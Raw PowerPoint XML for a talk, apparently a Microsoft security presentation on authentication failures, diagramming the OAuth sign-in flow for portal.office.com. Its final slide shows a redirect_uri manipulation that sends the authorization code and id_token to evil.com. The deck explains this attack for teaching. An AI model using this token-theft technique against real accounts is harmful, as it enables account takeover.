            <a:ext cx="2027797" cy="1796219"/>
            <a:chOff x="8453558" y="3500705"/>
            <a:chExt cx="2027797" cy="1796219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4ADE0A4-ADAA-44A1-92A2-E1CC1DA91C62}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8453558" y="3500705"/>
              <a:ext cx="2027797" cy="1796219"/>
              <a:chOff x="4526446" y="1831499"/>
              <a:chExt cx="3116429" cy="319500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5566BB3-6392-4F8E-81EE-9525D6C502CB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5152407" y="1831499"/>
                <a:ext cx="1887187" cy="1887188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1763037-3138-4D0C-8B18-1F895004D5DF}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4526446" y="3835353"/>
                <a:ext cx="3116429" cy="1191147"/>
                <a:chOff x="53089" y="2446840"/>
                <a:chExt cx="3116429" cy="119114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521EBF1-A200-417B-A695-EB14D02F2EF3}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="75768" y="2917987"/>
                  <a:ext cx="3093750" cy="720000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31842BB-431A-496A-A2DD-D36592505037}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="53089" y="2446840"/>
                  <a:ext cx="3093750" cy="100811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102235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cap="all"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" dirty="0"/>
                    <a:t>Request Scope</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
                </a:p>
                <a:p>
                  <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="102235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cap="all"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0">
                      <a:highlight>
                        <a:srgbClr val="FF0000"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>[</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1">
                      <a:highlight>
                        <a:srgbClr val="FF0000"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>Identity|profile</a:t>
                  </a:r>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0">
                      <a:highlight>
                        <a:srgbClr val="FF0000"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>|…]</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="Graphic 16" descr="Filter">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{676FE88F-FB31-4AF9-AA39-E9ACA1A0F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017635" y="3609963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95E23D-B4A5-4CA1-8E09-21D74A0D7DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9902840" y="3058827"/>
            <a:ext cx="2027797" cy="1796219"/>
            <a:chOff x="9907809" y="3500705"/>
            <a:chExt cx="2027797" cy="17962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C0B8B5E-371A-4EE5-BE12-25945123C972}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9907809" y="3500705"/>
              <a:ext cx="2027797" cy="1796219"/>
              <a:chOff x="4526446" y="1831499"/>
              <a:chExt cx="3116429" cy="319500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56A7902-1B9F-4CA3-A6AA-829ECBC29634}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5152407" y="1831499"/>
                <a:ext cx="1887187" cy="1887188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3AE7F29-3333-476C-985C-38DD071B7D7C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="4526446" y="3835353"/>
                <a:ext cx="3116429" cy="1191147"/>
                <a:chOff x="53089" y="2446840"/>
                <a:chExt cx="3116429" cy="1191147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8910AEB-B9B0-4AAD-9710-006FF8F76754}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="75768" y="2917987"/>
                  <a:ext cx="3093750" cy="720000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9917DDF-1681-432F-A7AA-083736D85638}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="53089" y="2446840"/>
                  <a:ext cx="3093750" cy="100811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102235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cap="all"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400"/>
                    <a:t>Where to respond?</a:t>
                  </a:r>
                </a:p>
                <a:p>
                  <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="102235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cap="all"/>
                  </a:pPr>
                  <a:r>
                    <a:rPr lang="en-US" sz="1400" kern="1200">
                      <a:highlight>
                        <a:srgbClr val="808080"/>
                      </a:highlight>
                    </a:rPr>
                    <a:t>Portal.office.com</a:t>
                  </a:r>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="24" name="Graphic 23" descr="Arrow: Horizontal U-turn">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F89CF9F-DEF2-4B4A-B8BB-119BA7274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503727" y="3542396"/>
              <a:ext cx="914400" cy="914400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE0A3327-8A91-44BC-B435-D2D08239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17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0" name="Rectangle 49" descr="Lock">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448D42FF-45EE-44D6-834D-139BD6EC7FDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="664691" y="3142983"/>
            <a:ext cx="907733" cy="825228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1" name="Graphic 50" descr="Bell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123EC7AA-428A-456F-A963-1141E991AE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3966" y="2102455"/>
            <a:ext cx="416747" cy="4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70F7D-6D34-45C8-8A27-305EF768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4497213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Authentication flow: Back home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DAAEC-478A-4A25-915A-D4119E6C417C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="71718" y="382672"/>
            <a:ext cx="3042518" cy="2401690"/>
            <a:chOff x="1398000" y="1861825"/>
            <a:chExt cx="4320000" cy="3134349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Rectangle 26" descr="Target Audience">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE816DFE-6A2A-4727-B668-9B0FCDA8121F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2586000" y="1861825"/>
              <a:ext cx="1944000" cy="19440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927252-2B60-4296-8685-0FE21D00CAF4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1398000" y="3547009"/>
              <a:ext cx="4320000" cy="1449165"/>
              <a:chOff x="559800" y="2158496"/>
              <a:chExt cx="4320000" cy="144916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5343D5-B403-42D4-BA99-62DC1080D8A8}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="559800" y="2887661"/>
                <a:ext cx="432000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52FB6E-F9C5-45F5-9F78-30D0CA64A928}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="559800" y="2158496"/>
                <a:ext cx="43200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20447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/>
                  <a:t>User</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="4600" kern="1200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246282-59E8-4615-BEF7-EDF9D7735383}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4217131" y="308738"/>
            <a:ext cx="3128841" cy="2210184"/>
            <a:chOff x="7664665" y="1592258"/>
            <a:chExt cx="3128841" cy="22101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A31DD7F-417E-4A9A-BF23-EB5BCA3F9312}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="7664665" y="2886191"/>
              <a:ext cx="3128841" cy="916251"/>
              <a:chOff x="5439323" y="2351299"/>
              <a:chExt cx="4516477" cy="125636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6932B3-9D8E-4334-8CD6-3F55CED51675}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5635800" y="2887661"/>
                <a:ext cx="432000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69263B-F84F-4244-9A61-7896E5A4E405}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5439323" y="2351299"/>
                <a:ext cx="43200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20447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/>
                  <a:t>App -&gt; Resource Provider</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Graphic 34" descr="Internet">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A769F7D-54CA-4F09-9FDF-B56856B08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39171" y="1592258"/>
              <a:ext cx="1643716" cy="1643716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9158BA-FF05-4F4C-A09E-02AF1826A450}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8753554" y="372561"/>
            <a:ext cx="2889450" cy="2376779"/>
            <a:chOff x="8417380" y="231785"/>
            <a:chExt cx="2889450" cy="2376779"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Rectangle 36" descr="Employee Badge">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C588004-0571-4F5C-924D-413041EA0A9C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9211979" y="231785"/>
              <a:ext cx="1300252" cy="1300252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50C242E-BA1A-4D28-AF67-E776CE18277A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8417380" y="1447442"/>
              <a:ext cx="2889450" cy="1161122"/>
              <a:chOff x="7208178" y="2067754"/>
              <a:chExt cx="2889450" cy="116112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8A23B63-2FBD-4A4D-B59D-C1B06CB7F4DA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7208178" y="2508876"/>
                <a:ext cx="288945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60D276-7E12-4136-A5FE-91C69887ED2D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7208178" y="2067754"/>
                <a:ext cx="288945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/>
                  <a:t>Identity Provider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F5A132-9165-4D4A-9B60-0FA0A08CB912}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1902865" y="2875449"/>
            <a:ext cx="28451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A13C17-1BC9-40C0-AF1F-65AB81477663}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2469838" y="2506117"/>
            <a:ext cx="179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portal.office.com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B1DFA8-127F-418B-ADA6-19C554647755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6958575" y="2888896"/>
            <a:ext cx="28451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BD4B8F2-54A6-49C9-8E73-CBB6D94055BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6958575" y="2506117"/>
            <a:ext cx="263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login.microsoftonline.com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5D2C1-D3F4-494B-A66F-888C0BE35EF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1846729" y="3300987"/>
            <a:ext cx="8510495" cy="1179144"/>
            <a:chOff x="1763059" y="3283547"/>
            <a:chExt cx="8510495" cy="117914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1771CC-5FF4-4E58-8EC9-51B78BA93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059" y="3681268"/>
              <a:ext cx="782298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6434FB2-B60C-4DEF-BFDB-2D18D280575D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1858725" y="4462691"/>
              <a:ext cx="284518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82144DD-76A9-43BB-B743-8D810526C12D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2543347" y="3283547"/>
              <a:ext cx="7730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Goto</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0"/>
                <a:t>&gt; portal.office.com/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>landing?</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                </a:rPr>
                <a:t>code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="FFFF00"/>
                  </a:highlight>
                </a:rPr>
                <a:t>=[…]</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:highlight>
                    <a:srgbClr val="00FF00"/>
                  </a:highlight>
                </a:rPr>
                <a:t>id_token</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="00FF00"/>
                  </a:highlight>
                </a:rPr>
                <a:t>:[…]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US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65E690-8D31-4234-AEF8-B62DAEB2A066}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2035133" y="4020895"/>
              <a:ext cx="25709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portal.office.com/landing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E970AF-697F-403B-8A4B-CBABE09E865C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4998973" y="2525327"/>
            <a:ext cx="1596384" cy="728262"/>
            <a:chOff x="4629818" y="2346394"/>
            <a:chExt cx="2187967" cy="1006933"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="Graphic 46" descr="Question mark">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F66AF34-1A2C-46FA-99DE-93AB8CE45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29818" y="2388379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Raised hand">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B932603-3C4F-4FC0-B9E8-3E3DA7EF9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37973" y="2346394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Right pointing backhand index ">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E313AEA-E3ED-405D-94B7-83E8F4CD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03385" y="2438927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Slide Number Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F169127-1BDE-4690-A569-7262FCDD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18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C5DD79-DAAF-4B0B-B6D9-BAC8F84BB55E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4664184" y="3951290"/>
            <a:ext cx="2451248" cy="1093651"/>
            <a:chOff x="4580514" y="3933850"/>
            <a:chExt cx="2451248" cy="1093651"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Graphic 13" descr="Thumbs up sign">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90F08A9A-7F91-43D7-B248-21CA2FAD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413" y="3933850"/>
              <a:ext cx="714387" cy="71438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1F07C8-EF6B-44B8-9A6D-67ECCEA86EA5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4580514" y="4658169"/>
              <a:ext cx="2451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code=[…]</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>&amp;</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:highlight>
                    <a:srgbClr val="00FF00"/>
                  </a:highlight>
                </a:rPr>
                <a:t>id_token</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:highlight>
                    <a:srgbClr val="00FF00"/>
                  </a:highlight>
                </a:rPr>
                <a:t>:[…]</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="50" name="Graphic 49" descr="Bell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B5447E1-66AA-45AF-93D5-9179949BD6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01486" y="4603895"/>
            <a:ext cx="416747" cy="4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1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B83346-711A-4B75-9F37-E6531AE4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07" y="1965472"/>
            <a:ext cx="5941068" cy="2792301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5455024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Authorization flow: Redeem code for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Token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6239-78B7-4E4A-9E45-69EF0ACF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3" y="1114264"/>
            <a:ext cx="5356415" cy="334887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/>
              <a:t>[POST] </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=&lt;Authorization Code&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>redirect_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=https://portal.office.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" fontAlgn="base">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>grant_type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>authorization_code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b="1" dirty="0" err="1"/>
              <a:t>client_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>=00000006-0000-0ff1-ce00-000000000000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77C9-45E8-499C-9F94-FBE96BEB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19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327F9-0FE4-418A-B717-063C859C8AC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6594903" y="2154977"/>
            <a:ext cx="3065029" cy="6894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A7C1E-628B-440A-A10E-42A782B6D94D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6594903" y="3195067"/>
            <a:ext cx="5132252" cy="11080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EA2A9-A3E8-47D5-B057-587AD1EF898C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610237" y="1706970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FF48B-24B7-4C65-AFE9-318EE2371A8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10862118" y="2750638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Claims</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Graphic 16" descr="Bell">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{748A5408-1FED-4C4F-9B6E-ED2A9ABD9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0407" y="4401164"/>
            <a:ext cx="356609" cy="3566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D7A0BD-13D8-4E1B-AAE2-497FDDDCB7D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="201704" y="386170"/>
            <a:ext cx="8852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6"/>
              </a:rPr>
              <a:t>https://login.microsoftonline.com/common/oauth2/token/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4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9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D616-BE38-447D-8DA6-EF8010D2C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700" dirty="0"/>
              <a:t>Identity Crisis: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>war stories from authentication failures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2FCF8-9C0E-4BD6-8694-2AA4F4286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Vishal Chauhan (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>axsdnied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Microsoft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black background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650E0D3C-0007-4ED2-A0D9-652EF2555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2" r="18885" b="-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927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29884"/>
            <a:ext cx="4893866" cy="1096331"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Authentication flow: The Unexpected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6239-78B7-4E4A-9E45-69EF0ACF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81" y="547536"/>
            <a:ext cx="10709071" cy="4183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What if? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://login.microsoftonline.com/common/oauth2/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>authorize?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>client_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=00000006-0000-0ff1-ce00-000000000000&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[…]&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>redirect_uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="222222"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>=https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>evil.com?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=[…]&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>id_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>=[…]] </a:t>
            </a:r>
